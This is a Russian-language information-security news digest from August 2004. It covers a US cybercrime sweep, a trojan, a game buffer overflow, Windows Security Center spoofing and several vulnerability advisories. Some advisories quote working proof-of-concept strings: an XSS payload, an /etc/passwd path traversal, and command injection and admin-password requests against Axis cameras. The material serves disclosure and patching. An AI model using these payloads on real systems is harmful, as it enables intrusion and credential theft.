Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

15 новостей по информационной безопасности каждый день


Информационный Канал Subscribe.Ru

Новости информационной безопасности Стратег.Ру
Ekey.ru Удостоверяющий Центр"

27.8.2004 - 27.8.2004

Содержание


Регулирование: Законы, постановления, сертификация, контроль

В "Веб-ловушку" в США попались 156 человек

27 августа | @ASTERA

Крупная операция по борьбе с преступниками, действующими в сфере высоких технологий, проведена в США. Как заявил на пресс-конференции в Вашингтоне генпрокурор США Джон Эшкрофт, в ходе операции "Веб-ловушка" арестованы 156 человек, совершившие преступления в 2003-2004гг.
Среди правонарушений Г.Эшкрофт выделил рассылку "спама", махинации с кредитными картами, хакерство и онлайн-мошенничество, передает АР.

По словам генпрокурора, в 2003г. в США было возбуждено 160 уголовных дел по факту преступлений в компьютерной сфере. Эти преступления нанесли более чем 150 тыс. пострадавших ущерб в размере 215 млн долл. Всего, по информации Дж.Эшкрофта, ежегодно в США ущерб от преступлений в компьютерной сфере составляет не менее 50 млрд долларов.

Интересно, что в конце прошлого года в США к 1 тыс. часов общественных работ и штрафу в 2 тыс. долл. был приговорен хакер, взломавший сайт телеканала Al-Jazeera. 24-летний Джона Уильяма Расина признали виновным в "сетевых махинациях" и незаконном вторжении в процесс обмена электронными данными. В свое оправдание обвиняемый заявил, что действовал "из чувства патриотизма".

Весной 2003г. хакер взломал несложную защиту сайта и установил перенаправление всех пользователей, которые заходили на сайт компании, на другую веб-страницу, на которой разместил изображение американского флага и надпись, гласящую "Пусть прозвучит свобода". В целом, сайт телеканала Al-Jazeera в результате этой акции не работал три дня подряд.

Представители самой катарской телекомпании Al-Jazeera заявили, что во взломе сайта участвовал не один человек, поэтому, по их мнению, приговор "не совсем полон".


Проблемные ситуации, информационная преступность, сетевые войны

Троян LQupdate с возможностью настройки

27 августа | compulenta.ru

Компания Sophos обнаружила новую вредоносную программу LQupdate. Этот троян после проникновения на компьютер с Windows записывает собственную копию в системную директорию под именем win???32.exe (??? - произвольные символы) и регистрируется в ключе автозапуска реестра. Затем LQupdate пытается загрузить из интернета файл со сценарием дальнейшего поведения. В зависимости от настроек, указанных в полученном файле, троян может менять стартовую страницу браузера, добавлять новые записи в папку "Избранное" или скачивать и запускать какие-либо дополнительные программные модули. Широкого распространения LQupdate пока не получил.

В игре Painkiller обнаружена критическая дыра

27 августа | compulenta.ru

игре Painkiller найдена очень опасная дыра, которая может использоваться злоумышленниками с целью выполнения на удаленном компьютере произвольного вредоносного кода. Для реализации нападения необходимо осуществить попытку соединения с сервером Painkiller с применением чрезмерно длинного пароля, состоящего из более чем 256 символов. Обработка этого пароля приведет к возникновению ошибки переполнения буфера и завершению игры. Уязвимость присутствует в Painkiller версии 1.3.1 и более ранних. Примечательно, что разработчики были информированы о существовании проблемы с проверкой паролей еще около месяца назад, однако соответствующая заплатка пока так и не была выпущена. Подробности читайте на этой странице.


Информационая безопасность общественной коммуникации, личности.

Дыра в "Центре безопасности" Windows XP SP2

27 августа | compulenta.ru

Издание PC Magazine обращает внимание на некоторые проблемы с "Центром безопасности" Windows - новым компонентом операционной системы, появившимся во втором сервис-паке для Windows XP. "Центр безопасности" отображает статус трех основных инструментов обеспечения безопасности: брандмауэра, антивируса и автоматических обновлений. Получить доступ к "Центру безопасности" можно из "Панели управления" или из системной панели, где значок Security Center находится рядом с часами.

Однако информация, отображаемая в "Центре безопасности", может быть подделана. Анонимное сообщение об этом получили в PC Magazine и проверили на собственном опыте. Как выяснилось, у "Центра безопасности" имеются несколько особенностей, которыми могут воспользоваться злоумышленники. Дело в том, что информация о состоянии программ хранится в базе данных, управляемой подсистемой Windows Management Instrumentation. Доступ к Windows Management Instrumentation осуществляется через набор интерфейсов WBEM, который доступен любым приложениям, как обычным программам, так и модулям ActiveX.

В результате, у вредоносной программы может появиться шанс изменить записи в базе данных и заставить "Центр безопасности" показывать ложную информацию. Для этого можно воспользоваться какой-либо уязвимостью в защите или дождаться момента, когда она будет отключена пользователем. Во всяком случае, редакции PC World удалось подделать информацию в окне "Центра безопасности" с помощью простого скрипта. В итоге, в окне стала отображаться информация о несуществующих брандмауэре и антивирусе, якобы стоящих на страже системы.

Чтобы осуществить подобные действия, можно воспользоваться дырами в Internet Explorer (а о наличии уязвимостей в браузере с установленным сервис-паком, уже сообщалось) либо прорехами в некоторых брандмауэрах и антивирусах. В итоге, пользователь будет чувствовать себя в безопасности, тогда как на его компьютере будут хозяйничать вредоносные программы.

В Microsoft, впрочем, не считают проблему слишком серьезной. Отвечая на вопросы PC Magazine, связанные с "особенностями" "Центра безопасности", в Microsoft отметили, что при включенном брандмауэре и антивирусе внести изменения в базу данных можно только в том случае, если пользователь сам запустит вредоносную программу. А в этом случае использовать "Центр безопасности" не нужно: проникнувшая в компьютер программа сможет отключить брандмауэр или антивирус самостоятельно. В Microsoft также считают неэффективной тактику, при которой вредоносная программа незаметно следит за состоянием "Центра безопасности", дожидаясь ручного отключения брандмауэра, и только после этого наносит удар. Скорее, хакеры захотят сразу отключить защиту компьютера, а не дожидаться пока эта защита отключится сама, считают в Microsoft.


События, семинары, конференции, даты

Международная конференция: "Проблемы противодействия компьютерной преступности"

27 августа | www.crime-research.ru

25-27 мая 2005 года Центр исследования компьютерной преступности (Запорожье, Украина), Международный антикриминальный антитеррористический комитет (МААК), Запорожский государственный университет (ЗГУ) при содействии Центра по изучению транснациональной преступности и коррупции при Американском университете (Вашингтон, США) проводят международную конференцию: "Проблемы противодействия компьютерной преступности".

Предлагаемая тематика конференции:

∙ Проблемы борьбы с компьютерной преступностью
∙ Проблемы борьбы и противодействия кибертерроризму
∙ Проблемы защиты интеллектуальной собственности и борьбы с компьютерным пиратством
∙ Уголовно-правовые проблемы информационной безопасности

Для участия в конференции приглашаются ученые, работники правоохранительных органов, аспиранты, преподаватели, представители коммерческих структур и все заинтересованные лица.


Подробнее : http://www.crime-research.ru/ccrc2005


Дыры и патчи программ и операционных сред

Удаленный доступ к учетной записи в PvPGN

27 августа | SecurityLab.ru

Программа: PvPGN до версии 1.6.4

Опасность: Средняя

Наличие эксплоита: нет

Описание: Уязвимость обнаружена в PvPGN. Удаленный пользователь может получить хеш пароля любого пользователя и затем получить доступ к учетной записи целевого пользователя.

Уязвимость обнаружена в обработке statsreq пакета. Удаленный пользователь может запросить произвольные атрибуты для произвольных учетных записей. Например, удаленный пользователь может запросить 'passhash' атрибут, чтобы получить хеш пароля целевого пользователя и используя эту информацию получить доступ к учетной записи целевого пользователя.

URL производителя: http://sourceforge.net/tracker/index.php?func=detail&aid=1014327&group_id=53514&atid=677785

Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=53514

Удаленный отказ в обслуживании в Symantec VelociRaptor

27 августа | SecurityLab.ru

Программа: Symantec VelociRaptor1.5

Опасность: Средняя

Наличие эксплоита: Нет

Описание: Уязвимость обнаружена в Symantec VelociRaptor. Удаленный пользователь может вызвать условия отказа в обслуживании.

Уязвимость обнаружена в isakmpd. Допольнительные подробности не раскрываются.

URL производителя: http://www.symantec.com/

Решение:Установите обновление: ftp://ftp.symantec.com/public/updates/entrust-vr15-3des.tgz

Межсайтовый скриптинг в Mantis

27 августа | SecurityLab.ru

Программа: Mantis 0.19.0a2

Опасность: Низкая

Наличие эксплоита: Да

Описание: Несколько уязвимостей в Mantis позволяют удаленному пользователю выполнить XSS нападение:

http://[target]/view_all_set.php?type=1&reporter_id=5031&hide_status=80<s cript>alert('hi')</script
Также уязвим параметр variable в login_page.php, параметр email в 'signup.php' и 'signup_page.php' и поле 'ref' в 'login_select_proj_page.php'.

URL производителя:http://mantis.sourceforge.net/

Решение:Установите обновление доступное через CVS: http://www.mantisbt.org/cvs.php

Небезопасное удаление в Webroot Window Washer

27 августа | SecurityLab.ru

Программа: Webroot Window Washer 5.5

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Webroot Window Washer. Программа не достаточно перезаписывает содержание удаленных файлов.

Функция 'Add Bleach to Wash' не работает как предполагается. Программа очищает FAT записи, но не очищает фактические данные.

URL производителя: http://www.webroot.com/wb/products/windowwasher/index.php

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленный просмотр файлов на целевой системе в WebAPP

27 августа | SecurityLab.ru

Программа: WebAPP

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость в WebAPP позволяет удаленному пользователю просматривать файлы на целевой системе, расположенные вне Web каталога.

Сценарий 'index.cgi' не проверяет переменную 'viewcat'. Пример:

 http://[target]/cgi-bin/index.cgi?action=topics&viewcat=./././././././etc/passwd% 00

URL производителя: http://www.web-app.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Удаленное выполнение произвольного кода в Hastymail

27 августа | SecurityLab.ru

Программа: Hastymail до версии 1.0.2

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в Hastymail IMAP клиента. Удаленный пользователь может послать специально обработанное сообщение, чтобы выполнить произвольный код сценария на компьютере целевого пользователя.

Когда пользователь использует ‘download' ссылку, запустится Internet Explorer и попытается отобразить внутри себя вложение. В результате, ко сценария в сообщении может выполнится когда целевой пользователь попытается загрузить содержание ссылки.

URL производителя: http://hastymail.sourceforge.net/

Решение:Установите обновленную версию программы: http://sourceforge.net/project/showfiles.php?group_id=66202

Несколько уязвимостей в Axis network cameras

27 августа | SecurityLab.ru

Программа: Axis Network Cameras Firmware Version 2.40; Axis 2100/2110/2120/2420/2130 Network Camera, 2400/2401 Video Server

Опасность: Высокая

Наличие эксплоита: Да

Описание: Несколько уязвимостей обнаружено в Axis network cameras. Удаленный пользователь может просматривать и редактировать файлы и получить административный доступ к целевой системе.

1.

/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/ httpd/html/passwd\x60 HTTP/1.1
2.
 
POST /cgi-bin/scripts/././this_server/ServerManager.srv HTTP/1.0\nContent-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%30t&checkAdmin=on&checkDial=on&ch eckView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables

Пример/Эксплоит: Еще примеры см. в источнике сообщения.

URL производителя: http://www.axis.com/products/video/camera/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Межсайтовый скриптинг в PHP Code Snippet Library

27 августа | SecurityLab.ru

Программа: PHP Code Snippet Library

Опасность: низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в PHP Code Snippet Library. Удаленный пользователь может выполнить XSS нападение:

http://[target]/[path]/index.php?cat_select=[XSS]
http://[target]/[path]/index.php?cat_select=[XSS]&show=[XSS]

URL производителя: http://www.php-csl.com/snippets/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.




Инструменты управления содержанием Метод.ру
Дата создания документа: 18:48 27.08.04

http://subscribe.ru/
http://subscribe.ru/feedback/
Адрес подписки
Отписаться

В избранное